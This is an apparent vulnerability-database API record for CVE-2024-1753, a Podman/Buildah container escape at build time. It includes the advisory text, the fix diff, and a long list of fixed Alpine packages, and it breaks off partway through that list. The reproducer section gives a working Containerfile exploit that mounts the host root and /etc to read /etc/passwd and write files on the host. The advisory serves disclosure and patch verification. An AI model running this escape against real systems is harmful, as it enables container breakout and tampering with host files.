Lookup for vulnerabilities affecting packages.

GET /api/vulnerabilities/16734?format=api
HTTP 200 OK
Allow: GET, HEAD, OPTIONS
Content-Type: application/json
Vary: Accept

{
    "url": "http://public2.vulnerablecode.io/api/vulnerabilities/16734?format=api",
    "vulnerability_id": "VCID-gyyv-8fkv-syh5",
    "summary": "Podman affected by CVE-2024-1753 container escape at build time\n### Impact\n_What kind of vulnerability is it? Who is impacted?_\n\nUsers running containers with root privileges allowing a container to run with read/write access to the host system files when selinux is not enabled.  With selinux enabled, some read access is allowed.\n\n### Patches\nFrom @nalind .  This is a patch for Buildah (https://github.com/containers/buildah)  Once fixed there, Buildah will be vendored into Podman.\n\n```\n# cat /root/cve-2024-1753.diff\n--- internal/volumes/volumes.go\n+++ internal/volumes/volumes.go\n@@ -11,6 +11,7 @@ import (\n \n \t\"errors\"\n \n+\t\"github.com/containers/buildah/copier\"\n \t\"github.com/containers/buildah/define\"\n \t\"github.com/containers/buildah/internal\"\n \tinternalParse \"github.com/containers/buildah/internal/parse\"\n@@ -189,7 +190,11 @@ func GetBindMount(ctx *types.SystemContext, args []string, contextDir string, st\n \t// buildkit parity: support absolute path for sources from current build context\n \tif contextDir != \"\" {\n \t\t// path should be /contextDir/specified path\n-\t\tnewMount.Source = filepath.Join(contextDir, filepath.Clean(string(filepath.Separator)+newMount.Source))\n+\t\tevaluated, err := copier.Eval(contextDir, newMount.Source, copier.EvalOptions{})\n+\t\tif err != nil {\n+\t\t\treturn newMount, \"\", err\n+\t\t}\n+\t\tnewMount.Source = evaluated\n \t} else {\n \t\t// looks like its coming from `build run --mount=type=bind` allow using absolute path\n \t\t// error out if no source is set\n```\n### Reproducer\n\nPrior to testing, as root, add a memorable username to `/etc/passwd` via adduser or your favorite editor.   Also create a memorably named file in `/`.  Suggest: `touch /SHOULDNTSEETHIS.txt` and `adduser SHOULDNTSEETHIS`.  After testing, remember to remove both the file and the user from your system.\n\nUse the following Containerfile\n\n```\n# cat ~/cve_Containerfile\nFROM alpine as base\n\nRUN ln -s / /rootdir\nRUN ln -s /etc /etc2\n\nFROM alpine\n\nRUN echo \"ls container root\"\nRUN ls -l /\n\nRUN echo \"With exploit show host root, not the container's root, and create /BIND_BREAKOUT in / on the host\"\nRUN --mount=type=bind,from=base,source=/rootdir,destination=/exploit,rw ls -l /exploit; touch /exploit/BIND_BREAKOUT; ls -l /exploit\n\nRUN echo \"With exploit show host /etc/passwd, not the container's, and create /BIND_BREAKOUT2 in /etc on the host\"\nRUN --mount=type=bind,rw,source=/etc2,destination=/etc2,from=base ls -l /; ls -l /etc2/passwd; cat /etc2/passwd; touch /etc2/BIND_BREAKOUT2; ls -l /etc2 \n```\n\n#### To Test\n\n##### Testing with an older version of Podman with the issue\n```\nsetenforce 0\npodman build -f ~/cve_Containerfile .\n```\n\nAs part of the printout from the build, you should be able to see the contents of the `/' and `/etc` directories, including the `/SHOULDNOTSEETHIS.txt` file that you created, and the contents of the `/etc/passwd` file which will include the `SHOULDNOTSEETHIS` user that you created.  In addition, the file `/BIND_BREAKOUT` and `/etc/BIND_BREAKOUT2` will exist on the host after the command is completed.  Be sure to remove those two files between tests.  \n\n```\npodman rm -a\npodman rmi -a\nrm /BIND_BREAKOUT\nrm /etc/BIND_BREAKOUT2\nsetenforce 1\npodman build -f ~/cve_Containerfile .\n```\nNeither the `/BIND_BREAKEOUT` or `/etc/BIND_BREAKOUT2` files should be created.  An error should be raised during the build when both files are trying to be created.  Also, errors will be raised when the build tries to display the contents of the `/etc/passwd` file, and nothing will be displayed from that file.  \n\nHowever, the files in both the `/` and `/etc` directories on the host system will be displayed.\n\n##### Testing with the patch\n\nUse the same commands as testing with an older version of Podman.\n\nWhen running using the patched version of Podman, regardless of the `setenforce` settings,  you should not see the file that you created or the user that you added.  Also the `/BIND_BREAKOUT` and the `/etc/BIND_BREAKOUT` will not exist on the host after the test completes.\n\nNOTE: With the fix, the contents of the `/` and `/etc` directories, and the `/etc/passwd` file will be displayed, however, it will be the file and contents from the container image, and NOT the host system.  Also the `/BIND_BREAKOUT` and `/etc/BIND_BREAKOUT` files will be created in the container image.\n\n\n### Workarounds\nEnsure selinux controls are in place to avoid compromising sensitive system files and systems.  With \"setenforce 0\" set, which is not at all advised, the root file system is open for modification with this exploit.  With \"setenfoce 1\" set, which is the recommendation, files can not be changed.  However, the contents of the `/` directory can be displayed.  I.e., `ls -alF /` will show the contents of the host directory.\n\n### References\n\nUnknown.",
    "aliases": [
        {
            "alias": "CVE-2024-1753"
        },
        {
            "alias": "GHSA-874v-pj72-92f3"
        }
    ],
    "fixed_packages": [
        {
            "url": "http://public2.vulnerablecode.io/api/packages/446222?format=api",
            "purl": "pkg:apk/alpine/buildah@1.35.4-r0?arch=armhf&distroversion=v3.20&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/buildah@1.35.4-r0%3Farch=armhf&distroversion=v3.20&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/446224?format=api",
            "purl": "pkg:apk/alpine/buildah@1.35.4-r0?arch=ppc64le&distroversion=v3.20&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/buildah@1.35.4-r0%3Farch=ppc64le&distroversion=v3.20&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/468988?format=api",
            "purl": "pkg:apk/alpine/buildah@1.35.4-r0?arch=riscv64&distroversion=v3.23&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/buildah@1.35.4-r0%3Farch=riscv64&distroversion=v3.23&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/471107?format=api",
            "purl": "pkg:apk/alpine/buildah@1.35.4-r0?arch=s390x&distroversion=edge&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/buildah@1.35.4-r0%3Farch=s390x&distroversion=edge&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/499256?format=api",
            "purl": "pkg:apk/alpine/buildah@1.35.4-r0?arch=aarch64&distroversion=v3.22&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/buildah@1.35.4-r0%3Farch=aarch64&distroversion=v3.22&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/499261?format=api",
            "purl": "pkg:apk/alpine/buildah@1.35.4-r0?arch=riscv64&distroversion=v3.22&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/buildah@1.35.4-r0%3Farch=riscv64&distroversion=v3.22&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/499262?format=api",
            "purl": "pkg:apk/alpine/buildah@1.35.4-r0?arch=s390x&distroversion=v3.22&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/buildah@1.35.4-r0%3Farch=s390x&distroversion=v3.22&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/549376?format=api",
            "purl": "pkg:apk/alpine/buildah@1.35.4-r0?arch=ppc64le&distroversion=v3.21&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/buildah@1.35.4-r0%3Farch=ppc64le&distroversion=v3.21&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/446227?format=api",
            "purl": "pkg:apk/alpine/buildah@1.35.4-r0?arch=x86&distroversion=v3.20&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/buildah@1.35.4-r0%3Farch=x86&distroversion=v3.20&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/468990?format=api",
            "purl": "pkg:apk/alpine/buildah@1.35.4-r0?arch=x86&distroversion=v3.23&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/buildah@1.35.4-r0%3Farch=x86&distroversion=v3.23&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/471108?format=api",
            "purl": "pkg:apk/alpine/buildah@1.35.4-r0?arch=x86&distroversion=edge&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/buildah@1.35.4-r0%3Farch=x86&distroversion=edge&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/499257?format=api",
            "purl": "pkg:apk/alpine/buildah@1.35.4-r0?arch=armhf&distroversion=v3.22&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/buildah@1.35.4-r0%3Farch=armhf&distroversion=v3.22&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/499259?format=api",
            "purl": "pkg:apk/alpine/buildah@1.35.4-r0?arch=loongarch64&distroversion=v3.22&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/buildah@1.35.4-r0%3Farch=loongarch64&distroversion=v3.22&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/549377?format=api",
            "purl": "pkg:apk/alpine/buildah@1.35.4-r0?arch=riscv64&distroversion=v3.21&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/buildah@1.35.4-r0%3Farch=riscv64&distroversion=v3.21&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/549380?format=api",
            "purl": "pkg:apk/alpine/buildah@1.35.4-r0?arch=x86_64&distroversion=v3.21&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/buildah@1.35.4-r0%3Farch=x86_64&distroversion=v3.21&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/446221?format=api",
            "purl": "pkg:apk/alpine/buildah@1.35.4-r0?arch=aarch64&distroversion=v3.20&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/buildah@1.35.4-r0%3Farch=aarch64&distroversion=v3.20&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/446226?format=api",
            "purl": "pkg:apk/alpine/buildah@1.35.4-r0?arch=s390x&distroversion=v3.20&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/buildah@1.35.4-r0%3Farch=s390x&distroversion=v3.20&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/468984?format=api",
            "purl": "pkg:apk/alpine/buildah@1.35.4-r0?arch=armhf&distroversion=v3.23&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/buildah@1.35.4-r0%3Farch=armhf&distroversion=v3.23&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/471102?format=api",
            "purl": "pkg:apk/alpine/buildah@1.35.4-r0?arch=armhf&distroversion=edge&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/buildah@1.35.4-r0%3Farch=armhf&distroversion=edge&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/471104?format=api",
            "purl": "pkg:apk/alpine/buildah@1.35.4-r0?arch=loongarch64&distroversion=edge&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/buildah@1.35.4-r0%3Farch=loongarch64&distroversion=edge&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/499258?format=api",
            "purl": "pkg:apk/alpine/buildah@1.35.4-r0?arch=armv7&distroversion=v3.22&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/buildah@1.35.4-r0%3Farch=armv7&distroversion=v3.22&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/499260?format=api",
            "purl": "pkg:apk/alpine/buildah@1.35.4-r0?arch=ppc64le&distroversion=v3.22&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/buildah@1.35.4-r0%3Farch=ppc64le&distroversion=v3.22&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/549378?format=api",
            "purl": "pkg:apk/alpine/buildah@1.35.4-r0?arch=s390x&distroversion=v3.21&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/buildah@1.35.4-r0%3Farch=s390x&distroversion=v3.21&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/549379?format=api",
            "purl": "pkg:apk/alpine/buildah@1.35.4-r0?arch=x86&distroversion=v3.21&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/buildah@1.35.4-r0%3Farch=x86&distroversion=v3.21&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/468985?format=api",
            "purl": "pkg:apk/alpine/buildah@1.35.4-r0?arch=armv7&distroversion=v3.23&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/buildah@1.35.4-r0%3Farch=armv7&distroversion=v3.23&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/468987?format=api",
            "purl": "pkg:apk/alpine/buildah@1.35.4-r0?arch=ppc64le&distroversion=v3.23&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/buildah@1.35.4-r0%3Farch=ppc64le&distroversion=v3.23&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/468991?format=api",
            "purl": "pkg:apk/alpine/buildah@1.35.4-r0?arch=x86_64&distroversion=v3.23&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/buildah@1.35.4-r0%3Farch=x86_64&distroversion=v3.23&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/499264?format=api",
            "purl": "pkg:apk/alpine/buildah@1.35.4-r0?arch=x86_64&distroversion=v3.22&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/buildah@1.35.4-r0%3Farch=x86_64&distroversion=v3.22&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/549372?format=api",
            "purl": "pkg:apk/alpine/buildah@1.35.4-r0?arch=aarch64&distroversion=v3.21&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/buildah@1.35.4-r0%3Farch=aarch64&distroversion=v3.21&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/471106?format=api",
            "purl": "pkg:apk/alpine/buildah@1.35.4-r0?arch=riscv64&distroversion=edge&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/buildah@1.35.4-r0%3Farch=riscv64&distroversion=edge&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/446228?format=api",
            "purl": "pkg:apk/alpine/buildah@1.35.4-r0?arch=x86_64&distroversion=v3.20&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/buildah@1.35.4-r0%3Farch=x86_64&distroversion=v3.20&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/446223?format=api",
            "purl": "pkg:apk/alpine/buildah@1.35.4-r0?arch=armv7&distroversion=v3.20&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/buildah@1.35.4-r0%3Farch=armv7&distroversion=v3.20&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/549375?format=api",
            "purl": "pkg:apk/alpine/buildah@1.35.4-r0?arch=loongarch64&distroversion=v3.21&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/buildah@1.35.4-r0%3Farch=loongarch64&distroversion=v3.21&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/446225?format=api",
            "purl": "pkg:apk/alpine/buildah@1.35.4-r0?arch=riscv64&distroversion=v3.20&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/buildah@1.35.4-r0%3Farch=riscv64&distroversion=v3.20&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/468986?format=api",
            "purl": "pkg:apk/alpine/buildah@1.35.4-r0?arch=loongarch64&distroversion=v3.23&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/buildah@1.35.4-r0%3Farch=loongarch64&distroversion=v3.23&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/468989?format=api",
            "purl": "pkg:apk/alpine/buildah@1.35.4-r0?arch=s390x&distroversion=v3.23&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/buildah@1.35.4-r0%3Farch=s390x&distroversion=v3.23&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/471101?format=api",
            "purl": "pkg:apk/alpine/buildah@1.35.4-r0?arch=aarch64&distroversion=edge&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/buildah@1.35.4-r0%3Farch=aarch64&distroversion=edge&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/471103?format=api",
            "purl": "pkg:apk/alpine/buildah@1.35.4-r0?arch=armv7&distroversion=edge&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/buildah@1.35.4-r0%3Farch=armv7&distroversion=edge&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/499263?format=api",
            "purl": "pkg:apk/alpine/buildah@1.35.4-r0?arch=x86&distroversion=v3.22&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/buildah@1.35.4-r0%3Farch=x86&distroversion=v3.22&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/549373?format=api",
            "purl": "pkg:apk/alpine/buildah@1.35.4-r0?arch=armhf&distroversion=v3.21&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/buildah@1.35.4-r0%3Farch=armhf&distroversion=v3.21&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/468983?format=api",
            "purl": "pkg:apk/alpine/buildah@1.35.4-r0?arch=aarch64&distroversion=v3.23&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/buildah@1.35.4-r0%3Farch=aarch64&distroversion=v3.23&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/471105?format=api",
            "purl": "pkg:apk/alpine/buildah@1.35.4-r0?arch=ppc64le&distroversion=edge&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/buildah@1.35.4-r0%3Farch=ppc64le&distroversion=edge&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/471109?format=api",
            "purl": "pkg:apk/alpine/buildah@1.35.4-r0?arch=x86_64&distroversion=edge&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/buildah@1.35.4-r0%3Farch=x86_64&distroversion=edge&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/549374?format=api",
            "purl": "pkg:apk/alpine/buildah@1.35.4-r0?arch=armv7&distroversion=v3.21&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/buildah@1.35.4-r0%3Farch=armv7&distroversion=v3.21&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/411558?format=api",
            "purl": "pkg:apk/alpine/podman@4.9.4-r0?arch=ppc64le&distroversion=edge&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/podman@4.9.4-r0%3Farch=ppc64le&distroversion=edge&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/411559?format=api",
            "purl": "pkg:apk/alpine/podman@4.9.4-r0?arch=riscv64&distroversion=edge&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/podman@4.9.4-r0%3Farch=riscv64&distroversion=edge&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/513296?format=api",
            "purl": "pkg:apk/alpine/podman@4.9.4-r0?arch=s390x&distroversion=v3.21&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/podman@4.9.4-r0%3Farch=s390x&distroversion=v3.21&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/528355?format=api",
            "purl": "pkg:apk/alpine/podman@4.9.4-r0?arch=aarch64&distroversion=v3.20&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/podman@4.9.4-r0%3Farch=aarch64&distroversion=v3.20&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/528356?format=api",
            "purl": "pkg:apk/alpine/podman@4.9.4-r0?arch=armhf&distroversion=v3.20&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/podman@4.9.4-r0%3Farch=armhf&distroversion=v3.20&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/976273?format=api",
            "purl": "pkg:apk/alpine/podman@4.9.4-r0?arch=s390x&distroversion=v3.22&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/podman@4.9.4-r0%3Farch=s390x&distroversion=v3.22&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/976274?format=api",
            "purl": "pkg:apk/alpine/podman@4.9.4-r0?arch=x86&distroversion=v3.22&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/podman@4.9.4-r0%3Farch=x86&distroversion=v3.22&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/1013757?format=api",
            "purl": "pkg:apk/alpine/podman@4.9.4-r0?arch=armv7&distroversion=v3.23&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/podman@4.9.4-r0%3Farch=armv7&distroversion=v3.23&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/1013758?format=api",
            "purl": "pkg:apk/alpine/podman@4.9.4-r0?arch=loongarch64&distroversion=v3.23&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/podman@4.9.4-r0%3Farch=loongarch64&distroversion=v3.23&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/411554?format=api",
            "purl": "pkg:apk/alpine/podman@4.9.4-r0?arch=aarch64&distroversion=edge&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/podman@4.9.4-r0%3Farch=aarch64&distroversion=edge&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/411555?format=api",
            "purl": "pkg:apk/alpine/podman@4.9.4-r0?arch=armhf&distroversion=edge&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/podman@4.9.4-r0%3Farch=armhf&distroversion=edge&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/411556?format=api",
            "purl": "pkg:apk/alpine/podman@4.9.4-r0?arch=armv7&distroversion=edge&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/podman@4.9.4-r0%3Farch=armv7&distroversion=edge&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/411557?format=api",
            "purl": "pkg:apk/alpine/podman@4.9.4-r0?arch=loongarch64&distroversion=edge&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/podman@4.9.4-r0%3Farch=loongarch64&distroversion=edge&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/411560?format=api",
            "purl": "pkg:apk/alpine/podman@4.9.4-r0?arch=s390x&distroversion=edge&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/podman@4.9.4-r0%3Farch=s390x&distroversion=edge&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/411561?format=api",
            "purl": "pkg:apk/alpine/podman@4.9.4-r0?arch=x86&distroversion=edge&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/podman@4.9.4-r0%3Farch=x86&distroversion=edge&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/411562?format=api",
            "purl": "pkg:apk/alpine/podman@4.9.4-r0?arch=x86_64&distroversion=edge&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/podman@4.9.4-r0%3Farch=x86_64&distroversion=edge&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/513290?format=api",
            "purl": "pkg:apk/alpine/podman@4.9.4-r0?arch=aarch64&distroversion=v3.21&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/podman@4.9.4-r0%3Farch=aarch64&distroversion=v3.21&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/513291?format=api",
            "purl": "pkg:apk/alpine/podman@4.9.4-r0?arch=armhf&distroversion=v3.21&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/podman@4.9.4-r0%3Farch=armhf&distroversion=v3.21&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/513292?format=api",
            "purl": "pkg:apk/alpine/podman@4.9.4-r0?arch=armv7&distroversion=v3.21&reponame=community",
            "is_vulnerable": false,
            "affected_by_vulnerabilities": [],
            "resource_url": "http://public2.vulnerablecode.io/packages/pkg:apk/alpine/podman@4.9.4-r0%3Farch=armv7&distroversion=v3.21&reponame=community"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/packages/513293?format=api",
            "purl": "pkg:apk/alpine/podman@4.9.4-r0?arch=loongarch64&distroversion=v3.21&reponame=community",
            "is_vulnerable": false,
